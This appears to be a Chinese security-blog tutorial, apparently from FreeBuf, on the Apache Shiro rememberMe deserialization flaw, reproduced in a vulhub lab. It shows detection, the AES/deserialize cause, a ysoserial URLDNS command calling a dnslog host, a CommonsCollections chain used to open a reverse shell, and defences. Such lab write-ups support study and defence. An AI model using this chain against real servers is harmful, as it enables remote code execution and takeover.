Shiro反序列化漏洞原理详解及复现
2023-5-3 17:40:22 Author: www.freebuf.com(查看原文) 阅读量:29 收藏

freeBuf

主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

1 环境搭建

采用vulhub的shiro环境

# docker-compose up -d

访问8080端口测试是否成功
image.png

2 漏洞原理及利用

Shiro是一款开源安全框架,用于身份验证、授权和会话管理

0x01 漏洞探测

在登录时勾选Remember me,burp抓包可以看到,响应包的set-cookie字段存在rememberMe
image.png
后续访问时,cookie中携带rememberMe(由于在repeater测试,因此两次抓到的rememberMe不同)
image.png
反之,如果不勾选Remember me,则set-cookie时rememberMe=deleteMe
image.png
基于此特征,可以大致判断出网站是否使用shiro,是否存在漏洞

0x02 漏洞原理

此处不对源码进行详细分析,具体分析可以看大佬的这篇
服务端在接收到cookie后,会对cookie进行三部操作

  1. 检索rememberMe字段

  2. base64解码(从上图中也可以看出rememberMe字段进行了base64编码)

  3. AES解密,shiro默认加密方式,存在padding oracle攻击及密钥泄露,是可以利用的核心

  4. 对AES解密出的内容进行反序列化,此处为漏洞成因

0x03 漏洞利用

首先利用URLDNS链判断是否可以利用
URLDNS链从HashMap.readObject方法起始,经过HashMap.Hash->URL.hashCode->URLStreamHandler.hashCode,最终到URLStreamHandler.getHostAddress发送一次解析请求

利用ysoserial生成URLDNS链

$java -jar ysoserial URLDNS 'http://xxx.dnslog.cn'>1.txt

编写脚本对payload进行加密编码(后续放在github上)
删除JSESSIONID(当该字段存在时,不检测rememberMe),修改rememberMe为加密后的值发送
image.png
查看dnslog,成功发送请求,证明存在可利用漏洞
image.png

生成CC链,再次按照上述方式发送,执行命令为反弹shell(CC6可打通),注意vulhub靶机本身没有nc,如果使用nc需要先上传
image.png

3 其他版本反序列化漏洞

shiro721:1.4.2版本以下仍采用CBC加密,但密钥不再硬编码,因此可以使用padding oracle实现攻击
1.4.2+:加密方式变为GCM

4 防御

  1. 升级shiro版本

  2. 限制rememberMe字段长度


文章来源: https://www.freebuf.com/articles/web/365398.html
如有侵权请联系:admin#unsafe.sh